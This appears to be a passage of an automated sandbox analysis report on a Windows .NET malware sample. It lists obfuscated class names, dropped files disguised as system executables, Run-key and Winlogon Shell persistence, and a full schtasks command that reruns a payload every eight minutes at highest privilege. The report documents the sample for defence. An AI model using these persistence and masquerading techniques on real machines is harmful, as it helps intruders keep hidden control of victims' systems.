                            Source: LzmJLVB41K.exe, QlqAGMP8t0KAnnvWepQ.cs | High entropy of concatenated method names: 'PXnPxNbQJS', 'a9IPeGKBc6', 'HuCPOywUfi', 'RfaP1DGqIG', 'JnAPWgyquo', 'kfNPjkUYmf', 'eqIpn2TjvbaElhhHTRY0', 'NtMLDgTjJveXddh7AKks', 'ObdDuSTjwcxugetGx4ph', 'H5kEgUTjmVVWrlcZHlCu'
                            Source: LzmJLVB41K.exe, bBlcWoRBujXlj0soaLJ.cs | High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'm2sTP7paQlV', 'wN6TRThxbul', 'sddbf6TetZY8UD1X1cic', 'pqElVtTe8M1CbiS3ihta', 'KniaIKTe5A7o7SX4JNGG'
                            Source: LzmJLVB41K.exe, OYp49AWgovh5GVZlLTO.cs | High entropy of concatenated method names: 'Close', 'qL6', 'w5HWNx6gf3', 'wkCWGVj2JF', 'WsjWawe7TS', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                            Source: LzmJLVB41K.exe, k2wrCtGOwhHxum7docf.cs | High entropy of concatenated method names: 'GdCGWJoQOv', 'usGGj45m90', 'h35GgqVtGe', 'b6SGKoARY2', 'bcXGNQHVGP', 'JplGGZqghs', 'cT2GaReJu1', 'ErZGi1FGHN', 'zcLGrwt8he', 'oZgGYdjcLB'
                            Source: LzmJLVB41K.exe, nBHP4GAOqTDJsVNMAZA.cs | High entropy of concatenated method names: 'JysArDULRd', 'coMAYxlHyc', 'Qbkqv4T5abIBnVpeSBMu', 'TED1waT5N8G574cTFk80', 'GaleUBT5GEmiuMJMJdLn', 'BZb73FT5iIrZIfvSWLGx', 'o5aAw9T8rN', 'MtjtwxT5vtrJRKdhW5bp', 'yVL0q3T5Y9823UYgupaO', 'aZR9mYT5bKPwtKxgF9gm'
                            Source: LzmJLVB41K.exe, GPu2goRawgB39I08Zk7.cs | High entropy of concatenated method names: 'eXmR2vdIAm', 'XbttKWTOP7oJtVsdWj9h', 'UJ3Sg7TOcC2WbHc9bsIL', 'Lk4GFZTOlZVNTHQ8BCYK', 'MtLMMyTOQ04IhUWZ3keN', 'vLrro1TOhOx1hfl3DMag', 'kcqE1WTOX4TxmekfPNMM', 'H0OFhQTO0RBIPS1dUvMc', 'XaTulZsyY2', 'S1OVU5TOC8FnQymbcvBD'
                            Source: LzmJLVB41K.exe, ggxrBlPJOp6HWJJpuWD.cs | High entropy of concatenated method names: 'K64PUcjULW', 'vX1yxtTgRBhqOnMFYqxo', 'LMcr7sTgAVYj5SsROiQu', 'qcZfDcTg7SK1i5MOSdbZ', 'G4RFXLTgumbKmjViQVT2', 'P9X', 'vmethod_0', 'FyZTR8t4vRc', 'imethod_0', 'Cb9qRlTjz33VgRuR8TuX'
                            Source: LzmJLVB41K.exe, Ftt4ToBHXsaXCACABET.cs | High entropy of concatenated method names: 'Q4iBBt3xCL', 'LxbBt54NOB', 'bblB8v4DLN', 'URlB5ZeYLS', 'McCBxVQmYB', 'nkDM0kTvis9uX0BjpmiF', 'M1n2STTvGNREWEXKjB7K', 'LOTVRHTvaUUU218IFkw2', 'OgF3KuTvrnaXjmMwsyMS', 'DcPtc7TvYdTluD0U6VJW'
                            Source: LzmJLVB41K.exe, HBr6iFevxhAdBQEjae2.cs | High entropy of concatenated method names: 'Rq8ew4pa1t', 'qOTemM1iHq', 'Xixe3YrP8p', 'JmLe6Po1TF', 'khaeDtHH7O', 'DR3ndqT356NchDg2a5Qb', 'U2dbqRT3tAcBJJpRVwBE', 'mPpfjuT38CGQf566DSAw', 'W1P8SsT3xRR2FjoiZUxp'
                            Source: LzmJLVB41K.exe, hU4k0qE3NjnZjOXtpR4.cs | High entropy of concatenated method names: 'lgcTPCG6enu', 'RdPEDRPMCF', 'OyUTPfkj6Tg', 'AAcqF1Tr0SvD8pPFjnha', 'liaS2sTr980HQrxEJIkO', 'BNyVg7Trhmofy4ELFde9', 'JXnGF0TrXTYlniPQvQdM', 'yoe5CpTrsIlKrJY8Rh0N', 'SxqjjMTrp1bHI8UJDgp1', 'k4ZZiETrCtR3cbB8SbH8'
                            Source: LzmJLVB41K.exe, lwBqTdKgpKjbRpQ3xCp.cs | High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'ci7UuBTnHuKgFZlC4YY2', 'f70ZRmTnq5PiLlHybOPy', 'UvRPhqTnImC8H4womYeG'
                            Source: LzmJLVB41K.exe, D0xa2KEU9valmFPDfnP.cs | High entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'rDhEFTqAfw', 'uaeTPkf6Dvd', 'P95j1jTrEbpfhn2kwawA', 'aV6UVITrkLTo7fgJFGct', 'krBH8ZTryxAxhDPGYdN0', 'BWe4rUTrMsG03s9btR6b', 'fBNI81TrqLyyOlJycWSf'

                            Persistence and Installation Behavior

                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: unknown | Executable created and started: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Recovery\ctfmon.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Users\user\Desktop\QMBYhgjh.log
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Users\user\Desktop\rUslzROg.log
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Users\user\Desktop\yRglcgIV.log
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Users\user\Desktop\PYxQwTnj.log
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Users\user\Desktop\KlfRTWYv.log
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Users\user\Desktop\zxBbjKdN.log
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Users\user\Desktop\QMBYhgjh.log
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Users\user\Desktop\KlfRTWYv.log
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Users\user\Desktop\zxBbjKdN.log
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Users\user\Desktop\rUslzROg.log
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Users\user\Desktop\PYxQwTnj.log
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Users\user\Desktop\yRglcgIV.log

                            Boot Survival

                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LzmJLVB41K
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhost
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fozAQGvSmfTQIywuzSgkf" /sc MINUTE /mo 8 /tr "'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhost
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhost
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LzmJLVB41K
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LzmJLVB41K
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LzmJLVB41K
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LzmJLVB41K
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk

                            Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
